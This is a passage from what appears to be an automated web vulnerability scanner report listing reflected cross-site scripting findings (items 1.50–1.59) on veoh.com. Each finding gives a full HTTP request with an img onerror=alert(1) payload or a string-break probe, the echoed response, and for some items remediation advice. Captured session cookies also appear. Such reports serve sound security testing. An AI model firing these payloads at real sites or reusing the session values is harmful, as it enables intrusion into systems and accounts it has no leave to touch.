This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/ddc51<img%20src%3da%20onerror%3dalert(1)>095a10c6f35=a%20onerror=alert(1)>b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('') HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:14 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=93
Content-Length: 76573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_ddc51<img src=a onerror=alert(1)>095a10c6f35=a onerror=alert(1)>
...[SNIP]...

1.50. http://www.veoh.com/browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/a [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/a

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 94381<img%20src%3da%20onerror%3dalert(1)>52a0288ccee was submitted in the REST URL parameter 4. This input was echoed as 94381<img src=a onerror=alert(1)>52a0288ccee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d81594381<img%20src%3da%20onerror%3dalert(1)>52a0288ccee/watch/v18978294NGnK88j8/a HTTP/1.1
Host: www.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; JSESSIONID=FA513D5C45F8F3409631CA9302C4270B; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmb=91933981.1.10.1296766388; __utmc=91933981

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:26:11 GMT
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 77063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<img src=a onerror=alert(1)>b411440d81594381<img src=a onerror=alert(1)>52a0288ccee/sort/most viewed" selected="selected">
...[SNIP]...

1.51. http://www.veoh.com/browse/videos/category/animation/watch/v20767083WdnCj7gW [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/animation/watch/v20767083WdnCj7gW

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cd065<img%20src%3da%20onerror%3dalert(1)>a077cbaf92d was submitted in the REST URL parameter 4. This input was echoed as cd065<img src=a onerror=alert(1)>a077cbaf92d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/animationcd065<img%20src%3da%20onerror%3dalert(1)>a077cbaf92d/watch/v20767083WdnCj7gW HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:51 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=18
Content-Length: 74501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_animationcd065<img src=a onerror=alert(1)>a077cbaf92d"}</textarea>
...[SNIP]...

1.52. http://www.veoh.com/browse/videos/category/animation/watch/v20767083WdnCj7gW [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/animation/watch/v20767083WdnCj7gW

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba538"><img%20src%3da%20onerror%3dalert(1)>0ced7d2746a was submitted in the REST URL parameter 4. This input was echoed as ba538"><img src=a onerror=alert(1)>0ced7d2746a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/animationba538"><img%20src%3da%20onerror%3dalert(1)>0ced7d2746a/watch/v20767083WdnCj7gW HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:28 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=12
Content-Length: 74545

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/animationba538"><img src=a onerror=alert(1)>0ced7d2746a/sort/most viewed" selected="selected">
...[SNIP]...

1.53. http://www.veoh.com/browse/videos/category/animation/watch/v20767083WdnCj7gW [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/animation/watch/v20767083WdnCj7gW

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14c7e'%3b1844de9a605 was submitted in the REST URL parameter 6. This input was echoed as 14c7e';1844de9a605 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/animation/watch/v20767083WdnCj7gW14c7e'%3b1844de9a605 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:39:01 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=96
Content-Length: 93332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'aa49d30e823c344f940751878361a0f0',
'v20767083WdnCj7gW14c7e';1844de9a605'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.54. http://www.veoh.com/browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcae8"><img%20src%3da%20onerror%3dalert(1)>26d66e628b1 was submitted in the REST URL parameter 4. This input was echoed as fcae8"><img src=a onerror=alert(1)>26d66e628b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/celebrity_and_showbizfcae8"><img%20src%3da%20onerror%3dalert(1)>26d66e628b1/watch/v20767641DYmkkC9T HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:07 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=50
Content-Length: 77572

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/celebrity_and_showbizfcae8"><img src=a onerror=alert(1)>26d66e628b1/sort/most viewed" selected="selected">
...[SNIP]...

1.55. http://www.veoh.com/browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fb1e3<img%20src%3da%20onerror%3dalert(1)>01b1c12b160 was submitted in the REST URL parameter 4. This input was echoed as fb1e3<img src=a onerror=alert(1)>01b1c12b160 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/celebrity_and_showbizfb1e3<img%20src%3da%20onerror%3dalert(1)>01b1c12b160/watch/v20767641DYmkkC9T HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:47 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=9
Content-Length: 77528

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_celebrity_and_showbizfb1e3<img src=a onerror=alert(1)>01b1c12b160"}</textarea>
...[SNIP]...

1.56. http://www.veoh.com/browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e231'%3bf41ab2e3621 was submitted in the REST URL parameter 6. This input was echoed as 3e231';f41ab2e3621 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T3e231'%3bf41ab2e3621 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:59 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=98
Content-Length: 99706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'0c90fe9c71e40fe15f4f32a57a50efef',
'v20767641DYmkkC9T3e231';f41ab2e3621'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.57. http://www.veoh.com/browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa06e"><img%20src%3da%20onerror%3dalert(1)>7b8d668185d was submitted in the REST URL parameter 4. This input was echoed as aa06e"><img src=a onerror=alert(1)>7b8d668185d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/educational_and_howtoaa06e"><img%20src%3da%20onerror%3dalert(1)>7b8d668185d/watch/v20767155HXCcYkcJ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:59 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=96
Content-Length: 78368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/educational_and_howtoaa06e"><img src=a onerror=alert(1)>7b8d668185d/sort/most viewed" selected="selected">
...[SNIP]...

1.58. http://www.veoh.com/browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1b1b0<img%20src%3da%20onerror%3dalert(1)>1aed6fadab1 was submitted in the REST URL parameter 4. This input was echoed as 1b1b0<img src=a onerror=alert(1)>1aed6fadab1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/educational_and_howto1b1b0<img%20src%3da%20onerror%3dalert(1)>1aed6fadab1/watch/v20767155HXCcYkcJ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:45 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=90
Content-Length: 78324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_educational_and_howto1b1b0<img src=a onerror=alert(1)>1aed6fadab1"}</textarea>
...[SNIP]...

1.59. http://www.veoh.com/browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1c2d'%3b713d1af7ffd was submitted in the REST URL parameter 6. This input was echoed as b1c2d';713d1af7ffd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJb1c2d'%3b713d1af7ffd HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:55 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=80
Content-Length: 99708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
